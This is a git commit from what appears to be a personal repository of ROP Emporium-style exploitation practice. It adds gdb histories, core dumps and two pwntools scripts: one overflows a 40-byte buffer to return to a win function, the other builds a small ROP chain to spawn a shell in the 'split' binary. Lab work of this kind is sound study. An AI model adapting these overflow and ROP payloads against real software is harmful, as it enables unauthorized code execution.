new file: x86_64/ret2win/.gdb_history

new file:   x86_64/ret2win/core
	new file:   x86_64/ret2win/exploit.py
	new file:   x86_64/split/.gdb_history
	new file:   x86_64/split/core
	new file:   x86_64/split/core.split.25050
	new file:   x86_64/split/exploit.py
	new file:   x86_64/split/fuckyou
	new file:   x86_64/split/xaa
This commit is contained in:
Brett Weiland 2020-12-14 18:27:06 -06:00
parent c9f44615e7
commit ae586f332c
9 changed files with 292 additions and 0 deletions

View File

@ -0,0 +1,6 @@
starti
context
nexti
break main
continue
q

BIN
x86_64/ret2win/core Normal file

Binary file not shown.

13
x86_64/ret2win/exploit.py Executable file
View File

@ -0,0 +1,13 @@
#!/usr/bin/env python3
from pwn import *
prog = process('./ret2win')
payload = b''
for c in range(40):
payload += b'a'
payload += p64(0x0000000000400756)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))

256
x86_64/split/.gdb_history Normal file
View File

@ -0,0 +1,256 @@
print (char)usefulString
print (char&)usefulString
print (char*)usefulString
print (char)*usefulString
print (charusefulString
print (char)usefulString
print (char*)usefulString
print (char)*usefulString
quit
exit
quit
nexti
exit
quit
exit
quit
quit
exit
quit
context
next
continue
context
quit
nexti
continu
context
q
context
run
break main
continue
context
nexti
backtrace
set exception-debugger on
continue
quit
stepi
ret
return
stepi
break
delete
run
continue
clear
delete
continue
clear
delete
continue
delete 0x7f992453fece
delete 0
delete 1
delete 2
delete 3
quit
continue
context
q
context
q
quit
continue
context
continue
q
q
break main
continue
context
nexti
stepi
quit
break main
run
conitnue
continue
context
stepi
nexti
stepi
return
stepi
return
stepi
ret
return
stepi
return
stepi
stepi
info breakpoints
stepi
return
stepi
nexti
break 0x400706
break *0x400706
quit
continue
context
q
continue
context
continue
quit
continue
continue
quit
continue
context
quit
continue
quit
exit
quit
nexti
continue
quit
continue
quit
break pwnme
nexti
continue
bexti
nexti
quit
quit
continue
quit
continue
nexti
quit
continue
q
continue
quit
continue
[
quit
start < fuckyou
continue
q
break *0x0x000000000040074b
break *0x000000000040074b
run < fuckyou
context
x/s 0x7fffffffdb20
x/s 0x7fffffffdb20 - 20
x/s 0x7fffffffdb2
quit
break *0x000000000040074b
run < fuckyou
context
x/s 0x7fffffffdb20
x/s 0x7fffffffdb20 - 8
x/s 0x7fffffffdb20
x/s 0x7fffffffdb20 - 8
x/s 0x7fffffffdb20 + 8
quit
quit
run < fuckyou
quit
break *0x000000000040074b
run < fuckyou
context
stepi
q
break *0x000000000040074b
run < fuckyou
context
q
break *0x000000000040074b
run < fuckyou
context
x 0x7fffffffdb20-8
x 0x7ffff7fad800
q
break pwnme
run < fuckyou
nexti
q
break pwnme
run
q
break pwnme
run < fuckyou
context
nexti
q
break pwnme
run < fuckyou
nexti
x/100c 0x7ffff7fad800
context
nexti
quit
break *0x00000000004007c3
run < fuckyou
context
nexti
stepi
q
break pwnme
start < fuckyou
context
stepi
return
context
break pwnme
continue
q
break pwnme
run < fuckyou
context
nexti
stepi
q
continue
quit
continue
[A
quit
q
info break
nexti
break main
continue
nexti
return
nexti
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
continue
q
continue
nexti
q
continue
nexti
continue
quit

BIN
x86_64/split/core Normal file

Binary file not shown.

Binary file not shown.

17
x86_64/split/exploit.py Executable file
View File

@ -0,0 +1,17 @@
#!/usr/bin/env python3
from pwn import *
context.binary = "./split"
prog = process('./split')
payload = b''
for c in range(40): #originally 40
payload += b'a'
payload += p64(0x00000000004007c3)
payload += p64(0x0000000000601060) # usefulString
payload += p64(0x000000000040074b) # usefulFunction + offset
prog.sendline(payload)
prog.interactive()

BIN
x86_64/split/fuckyou Normal file

Binary file not shown.

BIN
x86_64/split/xaa Normal file

Binary file not shown.